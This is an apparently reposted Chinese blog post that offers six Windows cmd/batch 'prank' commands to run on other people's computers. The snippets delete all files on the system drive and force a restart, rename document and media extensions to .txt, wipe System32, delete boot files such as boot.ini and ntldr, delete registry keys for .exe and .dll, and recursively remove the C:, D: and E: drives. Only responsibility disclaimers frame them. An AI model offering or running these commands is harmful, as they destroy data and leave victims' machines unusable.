坑爹的cmd(整人專用)


今天我特地上網搜集了六條條最危險的cmd命令,注意!

如果你對其他人使用了這些cmd,本人概不負責。

1.藍屏死機

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -f -r -t 00

 

2.更改所有文件后綴名

Ren *.doc *.txt Ren *.jpeg *.txt

Ren *.lnk *.txt

Ren *.avi *.txt

Ren *.mpeg *.txt

Ren *.com *.txt

Ren *.bat *.txt

 

3.刪除system32

Del c:\windows\system32\*.* /q

 

4.使PC永久崩潰

@echo off

Attrib -r -s -h c:\autoexec.bat

Del c:\autoexec.bat

Attrib -r -s -h c:\boot.ini

Del c:\boot.ini

Attrib -r -s -h c:\ntldr

Del c:\ ntldr

Attrib -r -s -h c:\windows\win.ini

Del c:\windows\win.ini

 

5.刪除所有注冊表

@echo off

start reg delete HKCR/.exe

start reg delete HKCR/.dll

start reg delete HKCR/*

 

6.格式化硬盤

rd/s/q D:\

rd/s/q C:\

rd/s/q E:\

 

再次聲明,如果你使用這些命令造成了后果,本人一律不負責。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM